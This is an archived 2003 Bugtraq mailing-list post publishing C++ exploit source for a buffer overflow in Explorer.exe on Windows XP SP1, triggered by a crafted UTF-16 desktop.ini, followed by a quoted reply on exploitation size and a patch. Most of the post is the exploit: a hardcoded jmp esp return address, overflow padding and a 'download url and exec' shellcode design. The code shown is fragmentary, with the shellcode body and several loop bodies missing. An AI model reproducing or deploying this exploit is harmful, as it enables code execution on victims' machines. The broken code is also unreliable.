Home page logo

bugtraq logo Bugtraq mailing list archives

Re[2]: EXPLOIT: Buffer overflow in Explorer.exe on Windows XP SP1
From: "einstein, dhtm" <einstein_dhtm () front ru>
Date: Thu, 15 May 2003 18:45:20 +0400

hello bugtraq,

From MSDN:
DWORD GetPrivateProfileSection(
  LPCTSTR lpAppName,
  LPTSTR lpReturnedString,
  DWORD nSize,
  LPCTSTR lpFileName
[in] Size of the buffer pointed to by the lpReturnedString parameter, in TCHARs. 
Windows 95/98/Me: The maximum buffer size is 32,767 characters.

It's a pity that even own Microsoft programmers do not know that for
the unicode version of the function TCHAR will turn into a WCHAR.
And we speak about using unicode everywhere..

Here is an exploit for Windows XP Service Pack 1.
NOTE: the FFFE header which can be easily created with notepad is not
a new technique. It has been already used for another vulnerability in
IE (see http://security.nnov.ru/search/news.asp?binid=1782).
NOTE: the directory "domain HELL team" has to be read-only, otherwise
it won't work.
NOTE: it's possible to exploit this bug using a network shared
resource. It looks strange, but that doesn't work for samba shares.
P.S. don't blame me i didn't use argv[] for parameters. it's your
task to modify the source..

#include <fstream.h>
#include <string.h>
#include <stdio.h>
#include <windows.h>
#include <direct.h>

char shellcode[]=
//download url and exec shellcode
//doesn't have any hardcoded values
//except the base address of the program
//searches the import table for 
//LoadLibraryA, GetProcAddress and ExitProcess.
//by .einstein., dH team.

char unicode_header[] = "\xFF\xFE";
char shell_header[] = "[.ShellClassInfo]\x0d\x0a";

#define OVERFLOW_LEN 0xA1C

void main()
  char url[]="file://c:/winnt/system32/calc.exe";
 // char url[]="http://localhost/cmd.exe";;
  char eip[] = "\xcc\x59\xfb\x77"; //0x77fb59cc - WinXP SP1 ntdll.dll (jmp esp)

  char path[500]; 
  strcpy(path,"domain HELL team");

  ofstream out(path,ios::out+ios::binary);
  char zero = 0;
  for (int i=0;i<strlen(shell_header);i++)
  char pad = 'B';
  for (i=0;i<OVERFLOW_LEN;i++) out.write(&pad,1);
  char ebp[] = "1234";

  char pad0 = 1;


  char pad2 = 'C';
  for (i=0;i<12;i++) out.write(&pad,1);

  int len = sizeof(shellcode)-1+sizeof(url);
  printf("shellcode+url: %d bytes\n",len);
  if (len%2 == 1) 
    printf("it's odd, so add 1 extra byte");


domain HELL team.

ES> Hi:

-----Original Message-----
From: nesumin [mailto:nesumin () softhome net]

I could create the exploit code on my Japanese Windows XP SP1.
Perhaps, I think you can easily create the full exploit code
by the following;

* You can directly specify all overwritten data without thinking
  the UNICODE conversion if you create the "desktop.ini" as "UTF-16".
  (Adding BOM and encoding "[.ShellClassInfo]\x0d\x0a".)

* You can get the code area of about 0xFF4 bytes.
  (Before and after RET address)

ES> Obviously, I was playing in the ANSI world. Yes, I agree with you that the
ES> exploit code written in RTF-16 can be created with a size of about 0xFF4
ES> bytes. A piece of 0xFF4 bytes long exploit code can do a lot. So, my
ES> previous statement about limited exploitation of this buffer overflow is not
ES> accurate.

ES> It should be very easy to fix this bug. I manually modified the 800H to 400h
ES> in shell32.dll to fix it.

ES> Thanks a lot for your mention of BOM and UTF-16. Your concept is learnt and
ES> programmatically reproduced with GetPrivateProfileSectionW.

ES> Best regards

ES> Peter Huang

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]